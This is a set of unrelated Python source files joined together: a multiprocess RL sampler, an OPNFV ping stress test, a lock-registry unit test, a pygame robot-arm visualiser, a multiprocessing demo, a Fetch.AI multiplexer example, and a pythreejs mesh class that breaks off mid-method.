env_spaces = self._get_env_spaces(self.EnvCls, self.env_kwargs)
self._agent_init(agent, env_spaces, global_B=global_B,
env_ranks=env_ranks)
else:
env = self.EnvCls(**self.env_kwargs)
# env.reset()
# env.step(env.action_space.sample())
self._agent_init(agent, env.spaces, global_B=global_B,
env_ranks=env_ranks)
examples = self._build_buffers(self.EnvCls, self.env_kwargs, bootstrap_value)
self._build_parallel_ctrl(n_worker)
if traj_info_kwargs:
for k, v in traj_info_kwargs.items():
setattr(self.TrajInfoCls, "_" + k, v) # Avoid passing every init.
common_kwargs = self._assemble_common_kwargs(affinity, global_B)
workers_kwargs = self._assemble_workers_kwargs(affinity, seed, n_envs_list)
target = sampling_process if worker_process is None else worker_process
self.workers = [mp.Process(target=target,
kwargs=dict(common_kwargs=common_kwargs, worker_kwargs=w_kwargs))
for w_kwargs in workers_kwargs]
for w in self.workers:
w.start()
self.ctrl.barrier_out.wait() # Wait for workers ready (e.g. decorrelate).
return examples # e.g. In case useful to build replay buffer.
def obtain_samples(self, itr):
self.ctrl.itr.value = itr
self.ctrl.barrier_in.wait()
# Workers step environments and sample actions here.
self.ctrl.barrier_out.wait()
traj_infos = drain_queue(self.traj_infos_queue)
return self.samples_pyt, traj_infos
def evaluate_agent(self, itr):
self.ctrl.itr.value = itr
self.ctrl.do_eval.value = True
self.sync.stop_eval.value = False
self.ctrl.barrier_in.wait()
traj_infos = list()
if self.eval_max_trajectories is not None:
while True:
time.sleep(EVAL_TRAJ_CHECK)
traj_infos.extend(drain_queue(self.eval_traj_infos_queue,
guard_sentinel=True))
if len(traj_infos) >= self.eval_max_trajectories:
self.sync.stop_eval.value = True
logger.log("Evaluation reached max num trajectories "
f"({self.eval_max_trajectories}).")
break # Stop possibly before workers reach max_T.
if self.ctrl.barrier_out.parties - self.ctrl.barrier_out.n_waiting == 1:
logger.log("Evaluation reached max num time steps "
f"({self.eval_max_T}).")
break # Workers reached max_T.
self.ctrl.barrier_out.wait()
traj_infos.extend(drain_queue(self.eval_traj_infos_queue,
n_sentinel=self.n_worker))
self.ctrl.do_eval.value = False
return traj_infos
def shutdown(self):
self.ctrl.quit.value = True
self.ctrl.barrier_in.wait()
for w in self.workers:
w.join()
######################################
# Helpers
######################################
def _get_env_spaces(self, EnvCls, env_kwargs):
def get_spaces(EnvCls, env_kwargs, examples):
env = EnvCls(**env_kwargs)
examples['spaces'] = env.spaces
mgr = mp.Manager()
examples = mgr.dict()
w = mp.Process(target=get_spaces, args=(EnvCls, env_kwargs, examples))
w.start()
w.join()
return examples['spaces']
def _get_n_envs_list(self, affinity=None, n_worker=None, B=None):
B = self.batch_spec.B if B is None else B
n_worker = len(affinity["workers_cpus"]) if n_worker is None else n_worker
if B < n_worker:
logger.log(f"WARNING: requested fewer envs ({B}) than available worker "
f"processes ({n_worker}). Using fewer workers (but maybe better to "
"increase sampler's `batch_B`.")
n_worker = B
n_envs_list = [B // n_worker] * n_worker
if not B % n_worker == 0:
logger.log("WARNING: unequal number of envs per process, from "
f"batch_B {self.batch_spec.B} and n_worker {n_worker} "
"(possible suboptimal speed).")
for b in range(B % n_worker):
n_envs_list[b] += 1
return n_envs_list
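        # Worked example (illustrative, not part of the original code): with B=10
        # and n_worker=4 the base split is [2, 2, 2, 2]; the remainder of 2 is
        # spread over the first workers, so the method returns [3, 3, 2, 2].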
def _agent_init(self, agent, env_spaces, global_B=1, env_ranks=None):
agent.initialize(env_spaces, share_memory=True,
global_B=global_B, env_ranks=env_ranks)
self.agent = agent
def _build_buffers(self, EnvCls, env_kwargs, bootstrap_value):
self.samples_pyt, self.samples_np, examples = build_samples_buffer(
self.agent, EnvCls, env_kwargs, self.batch_spec, bootstrap_value,
agent_shared=True, env_shared=True, subprocess=True)
return examples
def _build_parallel_ctrl(self, n_worker):
self.ctrl = AttrDict(
quit=mp.RawValue(ctypes.c_bool, False),
barrier_in=mp.Barrier(n_worker + 1),
barrier_out=mp.Barrier(n_worker + 1),
do_eval=mp.RawValue(ctypes.c_bool, False),
itr=mp.RawValue(ctypes.c_long, 0),
)
self.traj_infos_queue = mp.Queue()
self.eval_traj_infos_queue = mp.Queue()
self.sync = AttrDict(stop_eval=mp.RawValue(ctypes.c_bool, False))
def _assemble_common_kwargs(self, affinity, global_B=1):
common_kwargs = dict(
EnvCls=self.EnvCls,
env_kwargs=self.env_kwargs,
agent=self.agent,
batch_T=self.batch_spec.T,
CollectorCls=self.CollectorCls,
TrajInfoCls=self.TrajInfoCls,
traj_infos_queue=self.traj_infos_queue,
ctrl=self.ctrl,
max_decorrelation_steps=self.max_decorrelation_steps,
torch_threads=affinity.get("worker_torch_threads", 1),
global_B=global_B,
)
if self.eval_n_envs > 0:
common_kwargs.update(dict(
eval_n_envs=self.eval_n_envs_per,
eval_CollectorCls=self.eval_CollectorCls,
eval_env_kwargs=self.eval_env_kwargs,
eval_max_T=self.eval_max_T,
eval_traj_infos_queue=self.eval_traj_infos_queue,
)
)
return common_kwargs
def _assemble_workers_kwargs(self, affinity, seed, n_envs_list):
workers_kwargs = list()
i_env = 0
g_env = sum(n_envs_list) * self.rank
for rank in range(len(n_envs_list)):
n_envs = n_envs_list[rank]
slice_B = slice(i_env, i_env + n_envs)
env_ranks = list(range(g_env, g_env + n_envs))
worker_kwargs = dict(
rank=rank,
env_ranks=env_ranks,
seed=seed + rank,
cpus=(affinity["workers_cpus"][rank]
if affinity.get("set_affinity", True) else None),
n_envs=n_envs,
samples_np=self.samples_np[:, slice_B],
sync=self.sync, # Only for eval, on CPU.
)
i_env += n_envs
g_env += n_envs
workers_kwargs.append(worker_kwargs)
return workers_kwargs
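        # Worked example (illustrative, not part of the original code): with
        # n_envs_list=[2, 2] and self.rank=1, g_env starts at 4, so worker 0 gets
        # env_ranks [4, 5] and samples_np[:, 0:2], worker 1 gets [6, 7] and [:, 2:4].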
|
posca_factor_ping.py
|
#!/usr/bin/env python
##############################################################################
# Copyright (c) 2017 Huawei Technologies Co.,Ltd and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
'''This file realizes the function of running the posca ping stress test script.
This file contains several parts:
First, it creates a script to run several threads.'''
import utils.logger as log
import uuid
import json
import os
import sys
import time
import threading
import datetime
import Queue
from utils.parser import Parser as conf_parser
import utils.env_prepare.quota_prepare as quota_prepare
import utils.env_prepare.stack_prepare as stack_prepare
import utils.infra_setup.runner.yardstick as runner_yardstick
import testsuites.posca.testcase_dashboard.posca_stress_ping as DashBoard
import utils.infra_setup.runner.docker_env as docker_env
# --------------------------------------------------
# logging configuration
# --------------------------------------------------
LOG = log.Logger(__name__).getLogger()
test_dict = {
"action": "runTestCase",
"args": {
"opts": {
"task-args": {}
},
"testcase": "ping_bottlenecks"
}
}
testfile = os.path.basename(__file__)
testcase, file_format = os.path.splitext(testfile)
cidr = "/home/opnfv/repos/yardstick/samples/ping_bottlenecks.yaml"
runner_DEBUG = True
q = Queue.Queue()
def env_pre(test_config):
test_yardstick = False
if "yardstick" in test_config["contexts"].keys():
test_yardstick = True
stack_prepare._prepare_env_daemon(test_yardstick)
quota_prepare.quota_env_prepare()
LOG.info("yardstick environment prepare!")
if(test_config["contexts"]['yardstick_envpre']):
stdout = runner_yardstick.yardstick_image_prepare()
LOG.debug(stdout)
def do_test():
func_name = sys._getframe().f_code.co_name
out_file = ("/tmp/yardstick_" + str(uuid.uuid4()) + ".out")
parameter_info = {}
yardstick_container = docker_env.yardstick_info['container']
cmd = runner_yardstick.yardstick_command_parser(debug=runner_DEBUG,
cidr=cidr,
outfile=out_file,
parameter=parameter_info)
stdout = docker_env.docker_exec_cmd(yardstick_container, cmd)
LOG.info(stdout)
out_value = 0
loop_value = 0
while loop_value < 60:
time.sleep(2)
loop_value = loop_value + 1
with open(out_file) as f:
data = json.load(f)
if data["result"]["criteria"] == "PASS":
LOG.info("yardstick run success")
out_value = 1
break
else:
LOG.error("yardstick error exit")
out_value = 0
break
q.put((out_value, func_name))
return out_value
def config_to_result(num, out_num, during_date, result):
testdata = {}
test_result = {}
test_result["number_of_stacks"] = float(num)
test_result["success_times"] = out_num
test_result["success_rate"] = out_num / num
test_result["duration_time"] = during_date
test_result["result"] = result
testdata["data_body"] = test_result
testdata["testcase"] = testcase
return testdata
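    # Illustrative example (not part of the original script): config_to_result(3,
    # 2.0, 45, "FAIL") yields a data_body with number_of_stacks 3.0, success_times
    # 2.0, success_rate ~0.67, duration_time 45 and result "FAIL".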
def func_run(condic):
test_date = do_test()
return test_date
def run(test_config):
con_dic = test_config["load_manager"]
test_num = con_dic['scenarios']['num_stack'].split(',')
if test_config["contexts"]["yardstick_ip"] is None:
con_dic["contexts"]["yardstick_ip"] =\
conf_parser.ip_parser("yardstick_test_ip")
if "dashboard" in test_config["contexts"].keys():
if test_config["contexts"]["dashboard_ip"] is None:
test_config["contexts"]["dashboard_ip"] =\
conf_parser.ip_parser("dashboard")
LOG.info("Create Dashboard data")
DashBoard.posca_stress_ping(test_config["contexts"])
env_pre(test_config)
LOG.info("yardstick environment prepare done!")
for value in test_num:
result = []
out_num = 0
num = int(value)
# pool = multiprocessing.Pool(processes=num)
threadings = []
LOG.info("begin to run %s thread" % num)
starttime = datetime.datetime.now()
for i in xrange(0, num):
temp_thread = threading.Thread(target=func_run, args=(str(i),))
threadings.append(temp_thread)
temp_thread.start()
for one_thread in threadings:
one_thread.join()
while not q.empty():
result.append(q.get())
for item in result:
out_num = out_num + float(item[0])
endtime = datetime.datetime.now()
LOG.info("%s thread success %d times" % (num, out_num))
during_date = (endtime - starttime).seconds
if out_num >= con_dic["scenarios"]['threshhold']:
criteria_result = "PASS"
else:
criteria_result = "FAIL"
data_reply = config_to_result(num, out_num, during_date,
criteria_result)
if "dashboard" in test_config["contexts"].keys():
DashBoard.dashboard_send_data(test_config['contexts'], data_reply)
conf_parser.result_to_file(data_reply, test_config["out_file"])
        if criteria_result == "FAIL":
break
LOG.info('END POSCA stress ping test')
return criteria_result
|
test_nameregistry.py
|
import logging
import random
import threading
import time
from unittest import TestCase
from dogpile.util import NameRegistry
log = logging.getLogger(__name__)
class NameRegistryTest(TestCase):
def test_name_registry(self):
success = [True]
num_operations = [0]
def create(identifier):
log.debug("Creator running for id: " + identifier)
return threading.Lock()
registry = NameRegistry(create)
baton = {"beans": False, "means": False, "please": False}
def do_something(name):
for iteration in range(20):
name = list(baton)[random.randint(0, 2)]
lock = registry.get(name)
lock.acquire()
try:
if baton[name]:
success[0] = False
log.debug("Baton is already populated")
break
baton[name] = True
try:
time.sleep(random.random() * 0.01)
finally:
num_operations[0] += 1
baton[name] = False
finally:
lock.release()
log.debug("thread completed operations")
threads = []
for id_ in range(1, 20):
t = threading.Thread(target=do_something, args=("somename",))
t.start()
threads.append(t)
for t in threads:
t.join()
assert success[0]
|
simulateAndVisualizeLive.py
|
"""
Created on 2/11/20
Marquette Robotics Club
Danny Hudetz
Purpose: change the variables of the megarm live and visualize what it will look
like
"""
import numpy as math
import pygame
import matplotlib
import matplotlib.pyplot as plt
import threading
# Define some colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
GRAY =(100, 100, 100)
LIGHTGRAY=(50,50,50)
pygame.init()
# Set the width and height of the screen [width, height]
WIDTH = 600
HEIGHT = 600
center = pygame.math.Vector2()
center.x = WIDTH/2
center.y = HEIGHT/2
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("MegarmModel")
clock = pygame.time.Clock()
font = pygame.font.Font('freesansbold.ttf', 15)
# Loop until the user clicks the close button.
done = False
#lengths of each arm portion
a = 31.5 #cm
b = 31.5 #cm
c = 7 #cm
#specified operation
operationHeight = 0 #cm
startAngle = 0 #deg
#graphics
scaleFactor = 2.5
lineWidth = 5
doGrid = True
doPlot = True
gridTileSize = 20 #cm
fps = 60
cyclesPerSec=.5
operationHeightStore=operationHeight
t1=t2=t3=ar=az=br=bz=cr=cz=frameCount=deg=deg2=endAngle=0
POI=[0,0]
circles=[]
points=[]
img = pygame.image.load("marquette_robotics.png")
imgScaled = pygame.transform.scale(img, (200, 66))
def changeAngles():
global endAngle, startAngle, operationHeight
if a<=abs(operationHeight):
if operationHeight>0:
operationHeight=a
print("max height reached")
else:
operationHeight=-a
print("min height reached")
if b>a and operationHeight>=0:
endAngle=180
else:
if a>b+operationHeight and a!=0:
endAngle=math.rad2deg(math.arcsin((b+operationHeight)/a))
elif a>=abs(operationHeight-b) and a!=0:
endAngle=-math.rad2deg(math.arcsin((operationHeight-b)/a))
if a+b>operationHeight>0:
endAngle=180-endAngle
startAngle = math.rad2deg(math.arcsin(operationHeight/a))
def userInputLoop():
global a,b,c,operationHeight,cyclesPerSec,done,scaleFactor,endAngle,startAngle,circles,gridTileSize
print("\nSyntax to change height to 10cm: \"z 10\"\nEnter q to quit.")
while not done:
userInput = input("What would you like to change? ")
words=userInput.split()
if len(words)==2:
circles=[]
print("Attempting adjust...")
if words[0]=="a":
a=float(words[1])
changeAngles()
elif words[0]=="b":
b=float(words[1])
changeAngles()
elif words[0]=="c":
c=float(words[1])
elif words[0]=="z":
operationHeight=float(words[1])
elif words[0]=="cps":
cyclesPerSec=float(words[1])
elif words[0]=="sa":
startAngle=float(words[1])
elif words[0]=="ea":
endAngle=float(words[1])
elif words[0]=="sf":
scaleFactor=float(words[1])
elif words[0]=="gs":
gridTileSize=float(words[1])
else:
print("Sorry, can't do that.")
elif words[0]=="q":
done=True
pygame.quit()
else:
print("Improper syntax")
def calculateAngles():
global t1,t2,t3,deg,deg2
deg += (360*cyclesPerSec)/fps
t1= -(((endAngle-startAngle)/2)*math.cos(math.deg2rad(deg)))+startAngle+(endAngle-startAngle)/2
if -1 <= (-operationHeight/b)+(a/b)*math.sin(math.deg2rad(t1)) <= 1:
t2= (math.rad2deg(math.arccos((-operationHeight/b)+(a/b)*math.sin(math.deg2rad(t1))))-t1-90)
t3=-t2-t1
calculateComponents();
#print(t1,t2,t3)
def calculateComponents():
global ar,az,br,bz,cr,cz
ta = math.deg2rad(t1)
ar = a*math.cos(ta)
az = -a*math.sin(ta)
tb = math.deg2rad(t2-270+t1)
br = b*math.sin(tb)
bz = b*math.cos(tb)
tc = math.deg2rad(t3-(90-(t2-180+t1)))
cr = c*math.sin(tc)
cz = c*math.cos(tc)
def overlay(t, x, y, color):
text = font.render(t, True, color, BLACK)
textRect = text.get_rect()
textRect.center = (x, y)
screen.blit(text, textRect)
def drawGrid():
for i in range(0,int(WIDTH/(scaleFactor*gridTileSize*2))+1):
gridRight = int(i*(scaleFactor*gridTileSize))+center.x
gridLeft = center.x-int(i*(scaleFactor*gridTileSize))
pygame.draw.line(screen, LIGHTGRAY, (gridRight, 0), (gridRight, HEIGHT), 1)
pygame.draw.line(screen, LIGHTGRAY, (gridLeft, 0), (gridLeft, HEIGHT), 1)
for j in range(0,int(HEIGHT/(scaleFactor*gridTileSize*2))+1):
gridDown = int(j*(scaleFactor*gridTileSize))+center.y
gridUp = center.y-int(j*(scaleFactor*gridTileSize))
pygame.draw.line(screen, LIGHTGRAY, (0, gridUp), (WIDTH, gridUp), 1)
pygame.draw.line(screen, LIGHTGRAY, (0, gridDown), (WIDTH, gridDown), 1)
try:
userThread = threading.Thread(target=userInputLoop, args=())
userThread.start()
except:
print("Error: unable to start thread")
changeAngles()
goingUp = True
while not done:
# --- Main event loop
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
frameCount+=1
if operationHeightStore!=operationHeight:
changeAngles()
operationHeightStore = operationHeight
calculateAngles()
screen.fill(BLACK)
avector = pygame.math.Vector2()
avector.x = ar*scaleFactor
avector.y = az*scaleFactor
bvector = pygame.math.Vector2()
bvector.x = br*scaleFactor
bvector.y = bz*scaleFactor
cvector = pygame.math.Vector2()
cvector.x = cr*scaleFactor
cvector.y = cz*scaleFactor
POI = center+avector+bvector+cvector
for cir in circles:
pygame.draw.circle(screen, GRAY, [int(cir.x),int(cir.y)], 1)
if doGrid:
drawGrid()
#if frameCount<fps/cyclesPerSec:
# if frameCount<1000:
# circles.append(POI)
# circles.append(center+avector)
pygame.draw.line(screen, RED, center, center+avector, lineWidth)
pygame.draw.line(screen, GREEN, center+avector, center+avector+bvector, lineWidth)
pygame.draw.line(screen, BLUE, center+avector+bvector, POI, lineWidth)
#pygame.draw.line(screen, GRAY, center, POI, 1)
pygame.draw.circle(screen, WHITE, [int(POI.x),int(POI.y)], 3)
pygame.draw.circle(screen, WHITE, [int(center.x),int(center.y)], 3)
pygame.draw.circle(screen, WHITE, [int((center+avector).x),int((center+avector).y)], 3)
pygame.draw.circle(screen, WHITE, [int((center+avector+bvector).x),int((center+avector+bvector).y)], 3)
finalRadius = (POI.x-center.x)/scaleFactor
finalHeight = -(POI.y-center.y)/scaleFactor
overlay("Grid tile is "+str(gridTileSize)+"cm by "+str(gridTileSize)+"cm", 100, 30, WHITE)
overlay("Radius: " + str(int(finalRadius)) + "cm", 100, 50, WHITE)
overlay("Height: " + str(int(finalHeight)) + "cm", 100, 70, WHITE)
overlay("Angle 1: " + str(int(t1)) + "deg", 100, 90, RED)
overlay("Angle 2: " + str(int(t2)) + "deg", 100, 110, GREEN)
overlay("Angle 3: " + str(int(t3)) + "deg", 100, 130, BLUE)
# print("t", t1, " r", finalRadius)
if (-1 <= (-operationHeight/b)+(a/b)*math.cos(math.deg2rad(90-t1)) <= 1) and doPlot:
points.append((finalRadius,t1))
screen.blit(imgScaled, (WIDTH-200, 0))
pygame.display.update()
clock.tick(fps)
if doPlot:
angles=[]
radii=[]
fig, ax = plt.subplots()
for p in points:
while(p[0]>360):
p=(p[0]-360,p[1])
angles.append(p[0])
radii.append(p[1])
ax.scatter(angles, radii)
ax.set(xlabel='radii (cm)', ylabel='angles (deg)',
title='Megarm Motion')
ax.grid()
fig.savefig("output.png")
plt.show()
pygame.quit()
|
test2.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
#http://cuiqingcai.com/3335.html
import multiprocessing
import time
def process(num):
time.sleep(num)
print ('Process:', num)
if __name__ == '__main__':
for i in range(5):
p = multiprocessing.Process(target=process, args=(i,))
p.start()
print('CPU number:' + str(multiprocessing.cpu_count()))
for p in multiprocessing.active_children():
print('Child process name: ' + p.name + ' id: ' + str(p.pid))
print('Process Ended')
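    # Illustrative note (not part of the original snippet): since the children are
    # never joined, 'Process Ended' usually prints before most 'Process:' lines.
    # To wait for the children instead, one could add:
    #     for p in multiprocessing.active_children():
    #         p.join()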
|
multiplexer_standalone.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the full script from the multiplexer-standalone.md file."""
import os
import time
from copy import copy
from threading import Thread
from typing import Optional
from aea.connections.stub.connection import StubConnection
from aea.mail.base import Envelope, Multiplexer
INPUT_FILE = "input.txt"
OUTPUT_FILE = "output.txt"
def run():
# Ensure the input and output files do not exist initially
if os.path.isfile(INPUT_FILE):
os.remove(INPUT_FILE)
if os.path.isfile(OUTPUT_FILE):
os.remove(OUTPUT_FILE)
# create the connection and multiplexer objects
stub_connection = StubConnection(
input_file_path=INPUT_FILE, output_file_path=OUTPUT_FILE
)
multiplexer = Multiplexer([stub_connection])
try:
# Set the multiplexer running in a different thread
t = Thread(target=multiplexer.connect)
t.start()
# Wait for everything to start up
time.sleep(3)
# Create a message inside an envelope and get the stub connection to pass it into the multiplexer
message_text = (
"multiplexer,some_agent,fetchai/default:0.1.0,\x08\x01*\x07\n\x05hello,"
)
with open(INPUT_FILE, "w") as f:
f.write(message_text)
# Wait for the envelope to get processed
time.sleep(2)
# get the envelope
envelope = multiplexer.get() # type: Optional[Envelope]
assert envelope is not None
# Inspect its contents
print(
"Envelope received by Multiplexer: sender={}, to={}, protocol_id={}, message={}".format(
envelope.sender, envelope.to, envelope.protocol_id, envelope.message
)
)
# Create a mirrored response envelope
response_envelope = copy(envelope)
response_envelope.to = envelope.sender
response_envelope.sender = envelope.to
# Send the envelope back
multiplexer.put(response_envelope)
# Read the output envelope generated by the multiplexer
with open(OUTPUT_FILE, "r") as f:
print("Envelope received from Multiplexer: " + f.readline())
finally:
# Shut down the multiplexer
multiplexer.disconnect()
t.join()
if __name__ == "__main__":
run()
|
DrawableMesh.py
|
import pythreejs as three
import numpy as np
from time import time, sleep
from .Colors import colors
from ..utils import Observer, ColorMap
import threading
import copy
import math
import re
class DrawableMesh (Observer):
def __init__(self, geometry, mesh_color = None, reactive = False):
super(DrawableMesh, self).__init__()
self._external_color = colors.teal
self._internal_color = colors.orange
self._color_map = None
self._metric_string = None
self._c_map_string = None
self._label_colors = None
self.texture = geometry.texture
self.faceVertexUvs = []
self.geometry = geometry
self.type = str(type(self.geometry))
if reactive:
self.geometry.attach(self)
        #Methods for initializing the mesh's attributes (color, mesh, wireframe, threejs_items, flags like updating and queue)
self.geometry_color = self.__initialize_geometry_color(mesh_color)
self.mesh = self.__initialize_mesh()
        ##Reminder: a wireframe is the object projected into screen space and rendered by drawing lines along each edge.
self.wireframe = self.__initialize_wireframe()
self.threejs_items = [self.mesh, self.wireframe]
self.updating = False
self.queue = False
def __initialize_geometry_color(self, mesh_color, geometry = None):
if geometry is None:
geometry = self.geometry
if mesh_color is None:
#External color is teal, initialized in __init__ and represented with a numpy array 1x3
color = np.repeat(self._external_color.reshape(1, 3), geometry.num_triangles*3, axis=0)
# This condition is for initializing the color of the internal part of volumetric meshes
if self.geometry.mesh_is_volumetric:
internal_color = geometry.internal_triangles_idx()
color[internal_color] = self._internal_color
else:
mesh_color = np.array(mesh_color, dtype=np.float)/255
color = np.repeat(mesh_color.reshape(1,3), geometry.num_triangles*3, axis=0)
self._external_color = mesh_color
return color
def update_wireframe_color(self, new_color):
self.wireframe.material.color = new_color
def update_wireframe_opacity(self, new_opacity):
self.wireframe.material.opacity = new_opacity
def update_internal_color(self, new_color, geometry = None):
if geometry is None:
geometry = self.geometry
self._internal_color = np.array(new_color)
# This condition is for updating the color of the internal part of volumetric meshes
if hasattr(geometry, "internals"):
internal_color = geometry.internal_triangles_idx()
self.geometry_color[internal_color] = new_color
        #_as_threejs_colors called with no arguments returns True for every element
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors]
tris, vtx_normals = geometry._as_threejs_triangle_soup()
interleaved = np.concatenate((tris, new_colors, vtx_normals), axis=1).astype(np.float32)
        #interleaved is made up of the triangle soup, the new colors and the normals of these vertices
self.mesh.geometry.attributes['color'].data.array = interleaved
def update_poly_color(self, new_color, poly_index, num_triangles=None, geometry=None):
if geometry is None:
geometry = self.geometry
if num_triangles is None:
if "Quadmesh" in str(type(self.geometry)):
num_triangles = 2
elif "Tetmesh" in str(type(self.geometry)):
num_triangles = 4
elif "Hexmesh" in str(type(self.geometry)):
num_triangles = 12
else:
num_triangles = 1
start = poly_index*num_triangles*3
end = start+num_triangles*3
indices = np.arange(start, end);
self.geometry_color[indices] = new_color
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors].astype(np.float32)
tris, vtx_normals = geometry._as_threejs_triangle_soup()
interleaved = np.c_[tris, new_colors, vtx_normals].astype(np.float32)
self.mesh.geometry.attributes['color'].data.array = interleaved
def update_external_color(self, new_color, geometry = None):
if geometry is None:
geometry = self.geometry
self._external_color = np.array(new_color)
#This condition is for initializing the color of the external part of volumetric meshes
if hasattr(geometry, "internals"):
internal_color = geometry.internal_triangles_idx()
self.geometry_color[np.logical_not(internal_color)] = new_color
else:
self.geometry_color[:] = new_color
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors]
tris, vtx_normals = geometry._as_threejs_triangle_soup()
if len(self.geometry.material) > 0 or self.texture is not None:
interleaved = np.concatenate((tris, new_colors, vtx_normals, self.geometry.uvcoords), axis=1).astype(np.float32)
else:
interleaved = np.concatenate((tris, new_colors, vtx_normals), axis=1).astype(np.float32)
self.mesh.geometry.attributes['color'].data.array = interleaved
def update_color_map(self, new_colors, geometry = None):
if geometry is None:
geometry = self.geometry
self.geometry_color[:] = geometry._as_threejs_colors(colors = new_colors)
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors]
tris, vtx_normals = geometry._as_threejs_triangle_soup()
if(tris.shape != new_colors.shape):
return
if len(self.geometry.material) > 0 or self.texture is not None:
interleaved = np.concatenate((tris, new_colors, vtx_normals, self.faceVertexUvs), axis=1).astype(np.float32)
else:
interleaved = np.concatenate((tris, new_colors, vtx_normals), axis=1).astype(np.float32)
self.mesh.geometry.attributes['color'].data.array = interleaved
def compute_color_map(self, metric_string, c_map_string, geometry=None):
if geometry is None:
geometry = self.geometry
self._metric_string = metric_string
self._c_map_string = c_map_string
#simplex metrics is a dictionary inherited by Abstract Mesh
#[propertyName : ((min, max), npArray (Nx1))]
(min_range, max_range), metric = self.geometry.simplex_metrics[metric_string]
        #viridis, parula, jet or red_blue
c_map = ColorMap.color_maps[c_map_string]
if min_range is None or max_range is None:
min_range = np.min(metric)
max_range = np.max(metric)
#ptp = peak to peak "Range of values (maximum - minimum) along an axis"
if (np.abs(max_range-min_range) > 1e-7):
normalized_metric = ((metric - np.min(metric))/np.ptp(metric)) * (c_map.shape[0]-1)
else:
normalized_metric = np.repeat(np.mean(metric), metric.shape[0])
else:
#Clip (limit) the values in an array.
#Given an interval, values outside the interval are clipped to the interval edges.
#ex. a = [0,1,2,3,4,5,6,7] clip(a, 1, 5) a = [1,1,2,3,4,5,5,5]
normalized_metric = np.clip(metric, min_range, max_range)
normalized_metric = (normalized_metric - min_range)/(max_range-min_range) * (c_map.shape[0]-1)
normalized_metric = 1-normalized_metric
        #np.rint rounds elements to the nearest integer
metric_to_colormap = np.rint(normalized_metric).astype(np.int)
mesh_color = c_map[metric_to_colormap]
self._color_map = mesh_color
self.update_color_map(mesh_color, geometry)
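        # Illustrative note (added for clarity, not part of the original code):
        # with an unbounded metric of [0., 0.5, 1.] and a 256-entry colormap, the
        # normalized indices become rint([0, 127.5, 255]) == [0, 128, 255].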
def update_color_label(self, geometry = None):
if geometry is None:
geometry = self.geometry
mesh_color = np.zeros((geometry.num_polys,3), dtype=np.float)
for idx, value in enumerate(self.geometry.labels):
if(int(value) not in self._label_colors):
self._label_colors[int(value)] = colors.random_color()
mesh_color[idx] = self._label_colors[int(value)]
self._color_map = mesh_color
self.update_color_map(mesh_color)
def __initialize_wireframe(self):
#LineBasicMaterial: A material for drawing wireframe-style geometries
edges_material = three.LineBasicMaterial(color='#686868',
linewidth = 1,
depthTest=True,
opacity=.2,
transparent=True)
wireframe = self.__get_wireframe_from_boundary()
return three.LineSegments(wireframe, material = edges_material)
def __get_drawable_from_boundary(self):
geometry_attributes = {}
tris, vtx_normals = self.geometry._as_threejs_triangle_soup()
new_colors = self.geometry_color[self.geometry._as_threejs_colors()].astype(np.float32)
if self.geometry.uvcoords is not None:
uvcoords = self.geometry.uvcoords.astype(np.float32)
coor = self.geometry.coor
uv = []
if len(uvcoords) != 0:
                #Map the UV coordinates into triangle-soup order
if 'Quadmesh' in self.type:
coor = np.c_[coor[:,:3], coor[:,2:], coor[:,0]]
coor = coor.flatten()
for c in coor:
uv.append(uvcoords[c - 1])
self.faceVertexUvs = np.array(uv).astype(np.float32)
if len(self.faceVertexUvs) != 0 :
interleaved_array = np.concatenate((tris, new_colors, vtx_normals, self.faceVertexUvs), axis=1)
buffer = three.InterleavedBuffer(array=interleaved_array, stride=4)
else:
interleaved_array = np.concatenate((tris, new_colors, vtx_normals), axis=1)
buffer = three.InterleavedBuffer(array=interleaved_array, stride=3)
#Making the interleavedBuffer using the interleaved_array made up of the triangle soup, the color and the vertices' normals, with a stride of 3
#itemsize = item size, dynamic = (is the normalized attribute o f the super class)?, offset = it's the offset from the start item,
geometry_attributes['position'] = three.InterleavedBufferAttribute(data=buffer, itemSize=3, dynamic = True)
geometry_attributes['color'] = three.InterleavedBufferAttribute(data=buffer, itemSize=3, offset=3, dynamic=True)
geometry_attributes['normal'] = three.InterleavedBufferAttribute(data=buffer, itemSize=3, offset=6, dynamic=True)
        if len(self.geometry.material) != 0 or self.geometry.texture is not None:
geometry_attributes['uv'] = three.InterleavedBufferAttribute(data=buffer, itemSize=2, offset=9, dynamic=True)
# # Buffer Geometry = an efficient representation of mesh, line, or point geometry
# Includes vertex positions, face indices, normals, colors, UVs, and custom attributes within buffers
drawable_geometry = three.BufferGeometry(attributes=geometry_attributes)
#The multiplier is used because groups need faces' indices in triangle soup and 'count' counts only the number of faces per material
mult = 1
if 'Trimesh' in self.type:
mult = 3
elif 'Quadmesh' in self.type:
mult = 6
if len(self.geometry.material) != 0:
'''
group = { start: Integer, count: Integer, materialIndex: Integer } where:
- start : the first triangle index of the group
- count : how many indices are included
- materialIndex : the material array index to use for this group
'''
i = 0
for g in self.geometry.groups:
if i == 0:
n = copy.copy(g)
drawable_geometry.exec_three_obj_method("addGroup", 0, mult * self.geometry.groups[g], self.search_key(g))
else:
drawable_geometry.exec_three_obj_method("addGroup", mult * self.geometry.groups[n], mult * self.geometry.groups[g],
self.search_key(g))
n = copy.copy(g)
i = i + 1
return drawable_geometry
    # search_key returns the position of the group corresponding to the position of the material in the material array
def search_key(self, s):
i = 0
for k in self.geometry.material.keys():
if s == k:
